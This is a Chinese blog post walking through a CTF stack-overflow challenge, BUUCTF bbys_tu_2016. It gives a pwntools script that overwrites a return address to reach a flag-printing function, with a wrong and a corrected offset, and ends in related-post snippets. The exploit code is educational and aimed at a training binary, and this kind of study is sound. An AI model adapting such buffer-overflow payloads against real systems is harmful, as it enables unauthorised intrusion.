[BUUCTF-pwn]——bbys_tu_2016

最新推荐文章于 2023-01-14 02:32:16 发布
最新推荐文章于 2023-01-14 02:32:16 发布
阅读量326 收藏
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114954995
版权

[BUUCTF-pwn]——bbys_tu_2016

简单的栈溢出,不过竟然是esp寻址,害的孩子找了好久还是要动态调试 一般地址会误差八个字节

在这里插入图片描述

error exploit

from pwn import *
#p = remote('node3.buuoj.cn',28360)
p = process('./bbys_tu_2016')
gdb.attach(p, "b *0x080485ED")
flag = 0x0804856D
payload = 'a' * (0xc + 4) + p32(flag)
p.sendline(payload)
p.interactive()

right exploit

from pwn import *
#p = remote('node3.buuoj.cn',28360)
p = process('./bbys_tu_2016')
gdb.attach(p, "b *0x080485ED")
flag = 0x0804856D
payload = 'a' * (0x14 + 4) + p32(flag)
p.sendline(payload)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bbys_tu_2016(ret2text)
weixin_45441024的博客
11-29 988
BUUCTF bbys_tu_2016(ret2text) 毫无疑问地check一下 运行一下,发现并没有给我们什么有用的信息,这是第一次尝试用gdb-peda来做题,附上gdb-peda的安装方式: $ git clone https://github.com/longld/peda.git ~/peda $ echo "source ~/peda/peda.py" >> ~/.gdbinit 那我们来调试一下吧 这里我在main函数的地方(ida里面找到的)下了一个断点,如果你想调
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[BUUCTF]PWN——bbys_tu_2016
mcmuyanga的博客
11-11 525
bbys_tu_2016 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况,测试时候发现输入长度过长程序会崩溃,猜测输入点存在问题 32位ida载入,检索程序里的字符串,发现有直接读出flag的函数可以利用 flag_addr=0x804856D main函数 没有限制v4的长度,存在溢出漏洞,覆盖ret为读出flag的地址即可 from pwn import * r=remote('node3.buuoj.cn',29593) flag_addr=0x
bbys_tu_2016
m0sway的博客
12-01 1050
bbys_tu_2016 使用checksec查看: 只开启了栈不可执行,看样子是栈溢出的题目。 拉进IDA中查看: 将用户输入的数据写入v4,但是并没有限制写入的长度,存在栈溢出。 查看下字符串,发现后门函数printFlag(): 那就直接溢出跳过来就完事。 然而事情并没有这样就结束,打了两次发现flag出不来,就用gdb调试了下: 输入的位置为0xffffd714,ebp位置为0xffffd728 实际的距离是0x14并不是IDA中所显示的0xc exp: from pwn import *
BUUCTF bbys_tu_2016&&xm_2019_awd_pwn2
doudoudedi
01-23 1019
在家希望武汉的师傅们一切都好~~ bbys_tu_2016 这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好setbuf函数不会先出现io流 exp: #!/usr/bin/python2 from pwn import * local=0 if local==1: p=process('../binary/...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
bbys_tu_2016(write up)
m0_73756460的博客
01-14 96
buuctf】刷题 bbys_tu_2016(write up)
【2020.11.16】ESP寻址、EBP寻址
oalken的博客
12-22 512
CS:代码段寄存器 DS:数据段寄存器 SS:堆栈段寄存器 如果包含ESP、EBP寄存器,则使用SS。 ESP寻址存在局限性,ESP中存储的是栈顶的值,栈顶的值受汇编指令影响,如果执行过程中往栈中压入数据,那么ESP的值就一直在变。 ...
BUUCTF 周练 Week1
weixin_44229639的博客
11-03 2746
Week 1 Q1 axb_2019_brop64(这题本来是盲打,buuoj给了源文件难度减少了很多) ​ IDA分析发现,read函数长度存在栈溢出 ​ checksec结果,没有Canary和PIE,可直接利用栈溢出构造rop ​ 本题靶机使用的是Ubuntu16 ​ 使用libc-2.23.so (或者可使用LibcSearcher 寻找对应libc) 构造rop思路: ​ 在此之前 puts函数已被调用,其GOT表被覆盖为真实的函数地址,可利用ROPgadget 得到real_puts_
BUUCTF刷题1
m0_51251108的博客
05-19 331
BUUCTF刷题wp题目:babyheap_0ctf_2017:pwn2_sctf_2016:[ZJCTF 2019]EasyHeap:hitcontraining_uaf:babyfengshui_33c3_2016pwnable_orw:picoctf_2018_buffer overflow 2:xdctf2015_pwn200:jarvisoj_level1:ciscn_2019_n_3:bbys_tu_2016:inndy_rop:roarctf_2019_easy_pwn:mrctf2020_
8. ESP寻址 EBP寻址
weixin_34092370的博客
09-20 516
寄存器传参和堆栈传参 寄存器传参 MOV ECX,1 MOV EBX,2 CALL XX MOV EAX,ECX ADD EAX,EBX RETN 堆栈传参 --ESP寻址 PUSH 1 PUSH 2 CALL XXX MOV EAX,DWORD PTR SS:[ESP+8] //当内存中括号中包含ESP或者EBP的话 用SS ADD EAX,DWORD PTR SS:[ESP+4...
BUUOJ PWN 41-60
2h4ox1n9
12-11 338
41、jarvisoj_level3_x64 本地没问题,jaroj也没问题,buu上说啥就是不行。。libc搜不到,奇了怪了,jaroj上不用选择版本直接就可以
buuctf pwn wp(第1.5波)学会用ELF语句进行AAAA(即本地做题目)
月阴荒的博客
03-24 560
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第二波,额还是很简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上(太简单的不想多看,太难的不会,除了中间那一档的也没哪些脚本是自己...
PWN-PRACTICE-BUUCTF-3
P1umH0的博客
07-24 133
PWN-PRACTICE-BUUCTF-3
linux内核二当家,Linux PWN从入门到熟练(二)
weixin_42602241的博客
04-30 141
前言上回说到,如何利用程序中system函数以及bin/sh字符串来进行pwn。这里我们会介绍,如何在栈可执行而system函数以及参数没有的情况下,如何自己布置payload进行pwn。此外,还提供了一份可以参考的pwn套路,套路熟悉了,即可慢慢转化为熟悉。故此名曰:入门到熟练(二)。练习题参考(利用库函数读取参数)所谓的入门到熟练,套路还是要有的。套路有了,就可以见招拆招。我们一步一步来。拿到...
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值